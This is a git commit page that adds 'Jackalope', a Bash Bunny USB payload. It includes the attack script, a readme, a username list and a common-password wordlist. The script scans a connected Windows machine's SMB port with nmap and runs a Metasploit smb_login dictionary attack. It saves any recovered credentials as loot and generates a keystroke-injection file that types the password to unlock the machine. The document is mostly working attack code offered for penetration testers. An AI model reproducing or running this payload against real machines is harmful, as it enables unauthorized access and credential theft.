hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add Jackalope (#380) 

* Adding Jackalope, a Bunny+Metasploit chimera project.

* Fixing inaccurate documentation.

* Generate the password entry payload on the alternate switch.

* Additional documentation concerning alternate payload mechanism.

* Branding

* Update readme.md

* rearchitecting payload to be independent. No longer overwrites alternate payload location. Uses WAIT interface to interact with the tester to reuse a password, clear the password, and re-attack the machine.
pull/381/head
Catatonic 2019-05-22 16:53:59 -07:00 committed by Darren Kitchen
parent 6760498c27
commit f171837db2
4 changed files with 268 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

118
payloads/library/credentials/Jackalope/payload.txt Normal file
View File

@ -0,0 +1,118 @@
#!/bin/bash
#
# Title: Jackalope
# Author: catatonic
# Version: 1.1.0
# Check readiness & prepare environment
LED SETUP
# REQUIRE-TOOL metasploit-framework
ATTACKMODE HID RNDIS_ETHERNET
# Ensure loot is available for recording results.
mount /dev/nandf /root/udisk/
ORIGINAL_SWITCH=$SWITCH_POSITION
PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
LOOTBASE=/root/udisk/loot/Jackalope/
# SETUP
GET TARGET_IP
GET TARGET_HOSTNAME
COUNT=$(ls -lad $LOOTBASE/$TARGET_HOSTNAME* | wc -l)
COUNT=$((COUNT+1))
LOOTDIR=$LOOTBASE/$TARGET_HOSTNAME-$COUNT
mkdir -p $LOOTDIR
source /etc/profile.d/rvm.sh
rvm --default use 2.6.2 >> $LOOTDIR/log.txt
MSF_DIR=/tools/metasploit-framework
# Save environment informaiton:
echo "PAYLOAD_DIR: $PAYLOAD_DIR" >> $LOOTDIR/log.txt
echo "MSF_DIR: $MSF_DIR" >> $LOOTDIR/log.txt
echo "LOOTDIR: $LOOTDIR" >> $LOOTDIR/log.txt
echo "TARGET_IP: $TARGET_IP" >> $LOOTDIR/log.txt
echo "TARGET_HOSTNAME: $TARGET_HOSTNAME" >> $LOOTDIR/log.txt
SYNC ()
{
sync; sleep 1; sync
}
CLEAR_PW()
{
LED SPECIAL
rm $PAYLOAD_DIR/quack_pass.txt
SYNC
WAIT
}
ENTER_PW()
{
sleep 1
QUACK $ORIGINAL_SWITCH/quack_pass.txt
QUACK ENTER
}
RECON()
{
ATTACKMODE RNDIS_ETHERNET
# Stage 1: Recon
LED STAGE1
echo "Executing nmap..." >> $LOOTDIR/log.txt
nmap -p 445 -Pn $TARGET_IP > $LOOTDIR/nmap_results.txt
if ! grep --quiet "445.*open" $LOOTDIR/nmap_results.txt;
then
LED FAIL2
SYNC
exit
fi
}
EXPLOIT()
{
# Stage 2: Exploit
LED STAGE2
export HOME=/root
cd $MSF_DIR
./msfconsole -q -x "use auxiliary/scanner/smb/smb_login; set RHOSTS $TARGET_IP; set USER_FILE $PAYLOAD_DIR/userlist.txt; set PASS_FILE $PAYLOAD_DIR/wordlist.txt; run; exit" > $LOOTDIR/msfconsole.txt
if ! grep --quiet "^\[+\]" $LOOTDIR/msfconsole.txt;
then
LED FAIL
echo "Payload failed, no logins found..." >> $LOOTDIR/log.txt
SYNC
exit
fi
grep "^\[+\]" $LOOTDIR/msfconsole.txt | grep -o \'.*\' | cut -d ':' -f 1 | cut -d "'" -f 2 > $LOOTDIR/user.txt
grep "^\[+\]" $LOOTDIR/msfconsole.txt | grep -o \'.*\' | cut -d ':' -f 2 | cut -d "'" -f 1 > $LOOTDIR/password.txt
# Focus needs to be set on the password field manually.
echo -n "STRING " > $PAYLOAD_DIR/quack_pass.txt
cat $LOOTDIR/password.txt >> $PAYLOAD_DIR/quack_pass.txt
SYNC
}
# High level view.
while true
do
if [ -f $PAYLOAD_DIR/quack_pass.txt ];
then
LED FINISH
else
RECON
EXPLOIT
continue
fi
WAIT
# User's choice, clear old password or enter password.
if [ "$SWITCH_POSITION" == "switch3" ];
then
CLEAR_PW
else
ENTER_PW
fi
done

49
payloads/library/credentials/Jackalope/readme.md Normal file
View File

@ -0,0 +1,49 @@
# Jackalope
```
`\ # # /'
| \ # # /;|
\ :\# #|; /
\./#_#\./
/ \
: O O "
| \ / |
\ v /
\_x_/
Jackalope
by: catatonic
```
* Author: catatonic
* Target: Windows (for now)
## Description
Uses ethernet to attempt dictionary attacks against passwords. When the password is discovered a payload is automatically generated and placed in the alternate switch location. This alternate payload may be used to unlock the machine by:
1. Checking loot OR...
2. Manually select user/password at login screen
3. Flip switch to alternate payload to enter password
To clear an already identified password from a GREEN status light, flip the switch to switch3 (arming) and the status light will change to SPECIAL (cyan).
## Configuration
No initial configuration is required for bunny firmware v1.6+.
### Per attack configuration
1. userlist.txt contains usernames to use in attack.
2. wordlist.txt contains passwords to use in attack.
Note: A fantastic collection of password wordlists are available: [SecLists](https://github.com/danielmiessler/SecLists)
## STATUS
| LED | Status |
| ----------------------- | ---------------------------------------------- |
| FAIL | Attack failed, username/password not found |
| FAIL2 | Attack failed, network inaccessible |
| STAGE 1 | Stage 1: checking for SMB port with nmap |
| STAGE 2 | Stage 2: Brute forcing |
| Green (solid) | Attack complete, check loot or flip switch to switch1 or switch2 to enter password. Flip switch to switch3 (arming) to clear password. |
| SPECIAL | Clearing/cleared password, flip switch to switch 1 or switch 2 to initiate attack. |
| Purple (solid) | Preparing to attack |

1
payloads/library/credentials/Jackalope/userlist.txt Normal file
View File

@ -0,0 +1 @@
Administrator

100
payloads/library/credentials/Jackalope/wordlist.txt Normal file
View File

@ -0,0 +1,100 @@
123456
password
12345678
qwerty
123456789
12345
1234
111111
1234567
dragon
123123
baseball
abc123
football
monkey
letmein
696969
shadow
master
666666
qwertyuiop
123321
mustang
1234567890
michael
654321
pussy
superman
1qaz2wsx
7777777
fuckyou
121212
000000
qazwsx
123qwe
killer
trustno1
jordan
jennifer
zxcvbnm
asdfgh
hunter
buster
soccer
harley
batman
andrew
tigger
sunshine
iloveyou
fuckme
2000
charlie
robert
thomas
hockey
ranger
daniel
starwars
klaster
112233
george
asshole
computer
michelle
jessica
pepper
1111
zxcvbn
555555
11111111
131313
freedom
777777
pass
fuck
maggie
159753
aaaaaa
ginger
princess
joshua
cheese
amanda
summer
love
ashley
6969
nicole
chelsea
biteme
matthew
access
yankees
987654321
dallas
austin
thunder
taylor
matrix